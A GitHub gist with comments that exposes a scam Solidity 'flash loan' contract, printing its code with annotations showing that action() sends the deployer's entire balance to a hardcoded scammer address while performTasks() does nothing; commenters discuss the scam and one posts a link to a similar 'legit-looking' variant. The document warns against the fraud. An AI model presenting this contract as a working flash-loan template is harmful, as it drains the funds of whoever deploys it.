Skip to content

Instantly share code, notes, and snippets.

@Mc01
Last active April 18, 2023 20:19
Show Gist options
  • Save Mc01/4a6f8f1913089ccdef83968a733c9ef1 to your computer and use it in GitHub Desktop.
Save Mc01/4a6f8f1913089ccdef83968a733c9ef1 to your computer and use it in GitHub Desktop.
[SCAM] Flash Loan Attack
pragma solidity ^0.5.0;
// Multiplier-Finance Smart Contracts - this is bullshit
import "https://github.com/Multiplier-Finance/MCL-FlashloanDemo/blob/main/contracts/interfaces/ILendingPoolAddressesProvider.sol";
import "https://github.com/Multiplier-Finance/MCL-FlashloanDemo/blob/main/contracts/interfaces/ILendingPool.sol";
// PancakeSwap Smart Contracts - this is bullshit
import "https://github.com/pancakeswap/pancake-swap-core/blob/master/contracts/interfaces/IPancakeCallee.sol";
import "https://github.com/pancakeswap/pancake-swap-core/blob/master/contracts/interfaces/IPancakeFactory.sol";
import "https://github.com/pancakeswap/pancake-swap-core/blob/master/contracts/interfaces/IPancakePair.sol";
// Code Manager -> 0x05f18088749F7eDffe9ae56d628dd97e5b4d048f
import "ipfs://QmeMRAEb96FW5P67PG4wrSqgpcXaYjrgXe5ERWpmKquhSs";
/*
pragma solidity ^0.5.0;
contract Manager {
function performTasks() public {
}
function pancakeDepositAddress() public pure returns (address) {
// Scammer address
return 0x05f18088749F7eDffe9ae56d628dd97e5b4d048f;
}
}
*/
contract GetFlashLoan {
string public tokenName;
string public tokenSymbol;
uint loanAmount;
Manager manager;
constructor(string memory _tokenName, string memory _tokenSymbol, uint _loanAmount) public {
tokenName = _tokenName;
tokenSymbol = _tokenSymbol;
loanAmount = _loanAmount;
manager = new Manager();
}
function action() public payable {
// this transfers your funds to scammer - 0x05f18088749F7eDffe9ae56d628dd97e5b4d048f
address(uint160(manager.pancakeDepositAddress())).transfer(address(this).balance);
// this method is empty
manager.performTasks();
}
}
@Rohan86388
Copy link

Yes you are right. The 13th line of the code makes it. But how did you found the scammer address.
Looking through the transaction or did you find out the ifps private code.

@hackingpirate1
Copy link

what about this code:
https://ghostbin.com/paste/pYThT
This looks legit^^ I opened the IPFS link and it seems like its really making a swap.
What do you think?

@jonesclarence37
Copy link

Yes you are right. The 13th line of the code makes it. But how did you found the scammer address.
Looking through the transaction or did you find out the ifps private code.

I second this claim. Looks sketchy. DON'T follow the ghost bin link either.

@5hanth
Copy link

5hanth commented Sep 19, 2021

yes. this is a scam. scammer is making youtube videos that noob devs will copy and try which wipes entire balance to the scammer's address 0x05f18088749F7eDffe9ae56d628dd97e5b4d048f
https://ipfs.io/ipfs/QmeMRAEb96FW5P67PG4wrSqgpcXaYjrgXe5ERWpmKquhSs

@AEsqion
Copy link

AEsqion commented Dec 18, 2021

yes, still there is a army of them, but flash loans are legit ... " Just trying to fin out, how to make it, many codes outthere.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment